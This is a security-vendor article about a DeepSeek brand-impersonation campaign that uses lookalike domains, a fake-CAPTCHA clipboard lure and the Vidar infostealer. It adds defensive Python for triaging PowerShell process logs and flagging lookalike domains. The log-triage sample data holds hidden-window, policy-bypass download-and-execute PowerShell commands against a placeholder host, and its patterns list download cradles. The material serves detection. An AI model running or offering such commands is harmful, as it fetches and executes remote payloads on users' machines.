
According to experts, the rapid proliferation of generative AI applications is creating new opportunities for cybercriminals. The new AI chatbot DeepSeek has already become a target: threat actors are exploiting its popularity to spread malware.
The AI chatbot DeepSeek, introduced in January, has gained mass attention so quickly that it has become a target of malware actors. Criminals are abusing DeepSeek's popularity through "brand impersonation": they create fake websites that mimic DeepSeek and trick users into disclosing sensitive information or installing malware. Furthermore, techniques such as clipboard injection are used in the attack chain to deliver malicious PowerShell commands, and the legitimate platforms Telegram and Steam are used to disguise command-and-control communications.
New domains imitate the DeepSeek website
ThreatLabz has identified several newly created domains that mimic the official DeepSeek website. These malicious domains are used for a range of activities, including cryptocurrency pump-and-dump schemes, fake forums designed to steal user credentials, gift card scams, and fake gambling sites. One of these campaigns uses a fake CAPTCHA to trick users into supposedly completing a registration process while secretly copying a malicious PowerShell command to the clipboard. When the user executes that command, the Vidar malware is downloaded; it steals credentials, cryptocurrency wallets, and other sensitive data.
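From the defender's side, the clipboard-injection step described above shows up as a PowerShell process launched with a pasted command line rather than a script file. The Python below is an added example, not Zscaler's or ThreatLabz's code: it scores process-creation log lines (a constructed pipe-separated format with constructed sample entries and a placeholder .invalid URL) for the hallmarks such pasted commands tend to share, decodes any -EncodedCommand payload so the hidden script is scanned as well, and raises an alert above a threshold. The indicator weights and the threshold are assumptions to be tuned against a local baseline.

```python
import base64
import re

# Log format assumed for this example (constructed): "<timestamp>|<image path>|<command line>".
# Sysmon Event ID 1 and Windows Security 4688 (with command-line auditing) carry the same fields.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# -EncodedCommand and its short forms (-e, -ec, -enc) take base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)

# Weighted heuristics (weights are assumptions). Patterns accept the abbreviated
# parameter names PowerShell allows (-w for -WindowStyle, -ep/-ex for -ExecutionPolicy).
INDICATORS = {
    "hidden_window":     (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    "encoded_command":   (ENCODED_RE, 2),
    "policy_bypass":     (re.compile(r"-e(?:p|x(?:ec(?:utionpolicy)?)?)\s+bypass\b", re.I), 2),
    "download_cradle":   (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                     r"downloadstring|downloadfile|start-bitstransfer)\b", re.I), 2),
    "invoke_expression": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "no_profile":        (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
}
ALERT_THRESHOLD = 3  # two strong indicators, or one strong plus one weak


def decode_encoded_command(cmd):
    """Recover the script text hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def score_command(cmd):
    """Return (score, sorted indicator names, decoded script or None) for one command line."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded  # scan the outer and the decoded layer
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(text))
    return sum(INDICATORS[n][1] for n in hits), hits, decoded


def triage_process_log(lines):
    """Return alert dicts for PowerShell launches whose score reaches the threshold."""
    alerts = []
    for line in lines:
        ts, image, cmd = line.split("|", 2)  # maxsplit keeps '|' inside the command line intact
        if image.rsplit("\\", 1)[-1].lower() not in POWERSHELL_IMAGES:
            continue
        score, hits, decoded = score_command(cmd)
        if score >= ALERT_THRESHOLD:
            alerts.append({"time": ts, "score": score, "indicators": hits, "decoded": decoded})
    return alerts


# Constructed sample log. The encoded entry is built the way PowerShell expects it.
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_ENCODED = base64.b64encode(
    "Invoke-WebRequest https://placeholder.invalid/stage -OutFile $env:TEMP\\stage.exe".encode("utf-16-le")
).decode("ascii")
SAMPLE_LOG = [
    f"2025-02-10T09:01:02Z|{_PS}|powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1",
    f"2025-02-10T09:03:15Z|{_PS}|powershell.exe -ExecutionPolicy Bypass -File C:\\deploy\\install.ps1",
    "2025-02-10T09:05:40Z|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\jdoe\\notes.txt",
    f"2025-02-10T09:07:11Z|{_PS}|powershell.exe -w hidden -ep bypass -c \"iex (iwr https://placeholder.invalid/stage)\"",
    f"2025-02-10T09:08:52Z|{_PS}|powershell.exe -nop -w hidden -enc {_ENCODED}",
]

if __name__ == "__main__":
    for alert in triage_process_log(SAMPLE_LOG):
        print(alert["time"], alert["score"], ", ".join(alert["indicators"]))
        if alert["decoded"]:
            print("   decoded:", alert["decoded"])
```

Only the two pasted-style launches cross the threshold; the deployment script that runs with -ExecutionPolicy Bypass alone stays below it, which is the point of weighting rather than matching single flags. In a real pipeline the parent process field from the same event is the natural next correlation, since a command pasted from a web page is not started by a scheduled task or a software deployment agent.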
Newly registered domains are often the first warning sign of malicious activity, as Zscaler's State of Encrypted Attacks report demonstrates: last year alone, a 400 percent increase in encrypted attacks using newly registered domains was observed. The timing, so close to DeepSeek's sudden rise in popularity, suggests that threat actors are looking to capitalize on the attention surrounding the new AI tool.
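Because newly registered lookalike domains are the leading indicator in this campaign, a simple first-pass triage is to compare each new registration against the brands you care about. The Python below is an added example, not code from Zscaler's report: it normalizes the second-level label (IDN decode, case folding, diacritics stripped, common confusable characters mapped to ASCII) and flags labels that contain a protected brand or sit within a small edit distance of it. The watchlist, the allowlist entry deepseek.example, the sample domains and the edit threshold are all constructed for the demonstration and are not indicators from the report.

```python
import unicodedata

# Assumptions for the demonstration: brands to protect and the brand's own domains to ignore.
PROTECTED_BRANDS = ("deepseek",)
ALLOWLIST = {"deepseek.example"}  # placeholder for the legitimate domain(s)
MAX_EDITS = 1  # edits allowed before a label counts as a near-match of a brand

# Characters commonly swapped for Latin letters in lookalike labels: digits/symbols plus a
# few Cyrillic confusables. Illustrative, not an exhaustive confusables table.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
})


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute) with a rolling two-row table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_label(domain):
    """Second-level label, IDN-decoded, lower-cased, diacritics removed, confusables mapped."""
    try:
        domain = domain.encode("ascii").decode("idna")  # punycode (xn--) back to Unicode
    except UnicodeError:
        pass  # already Unicode, or not valid IDNA: analyse the string as given
    label = domain.lower().split(".")[0]
    label = unicodedata.normalize("NFKD", label)
    label = "".join(ch for ch in label if not unicodedata.combining(ch))
    return label.translate(CONFUSABLES)


def lookalike_reason(domain, brands=PROTECTED_BRANDS):
    """Why a domain resembles a protected brand, or None if it does not."""
    if domain.lower() in ALLOWLIST:
        return None
    label = normalize_label(domain)
    squashed = label.replace("-", "")  # "dee-pseek" should still read as "deepseek"
    for brand in brands:
        if brand in squashed:
            return f"contains brand '{brand}'"
        for token in label.split("-"):  # each hyphen-separated part is tested on its own
            d = levenshtein(token, brand)
            if 0 < d <= MAX_EDITS:
                return f"{d} edit(s) from '{brand}'"
    return None


def flag_lookalikes(domains):
    """Map each suspicious domain to the reason it was flagged."""
    hits = {}
    for dom in domains:
        reason = lookalike_reason(dom)
        if reason:
            hits[dom] = reason
    return hits


# Constructed sample feed of "new registrations"; the last entry is built as punycode the way
# a zone feed would deliver a Cyrillic-e lookalike. None of these come from the report.
NEW_DOMAINS = [
    "deepseek-login.example",
    "dee-pseek.example",
    "deepseeek.example",
    "deepsek-chat.example",
    "D33PSEEK.example",
    "deepsea-tours.example",
    "weatherreport.example",
    "deepseek.example",
    "deeps\u0435ek.example".encode("idna").decode("ascii"),
]

if __name__ == "__main__":
    for dom, why in flag_lookalikes(NEW_DOMAINS).items():
        print(f"{dom:40} {why}")
```

With MAX_EDITS at 1 the unrelated deepsea-tours.example (two edits away) is left alone; raising the threshold to 2 would catch more aggressive misspellings at the cost of such false positives, so the value should be chosen per brand length and reviewed against a sample of benign registrations.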
Conclusion
The DeepSeek campaign demonstrates how quickly cybercriminals respond to the rapid adoption of new technologies and turn them to their own purposes. To protect their users and data, companies should implement clear guidelines for the use of generative AI together with comprehensive security controls. Furthermore, they must educate users to raise awareness of fraudulent websites.
More at Zscaler.com
About Zscaler
Zscaler accelerates digital transformation so customers can become more agile, efficient, resilient, and secure. Zscaler Zero Trust Exchange protects thousands of customers from cyberattacks and data loss by securely connecting people, devices, and applications anywhere. The SSE-based Zero Trust Exchange is the world's largest inline cloud security platform, distributed across 150+ data centers around the world.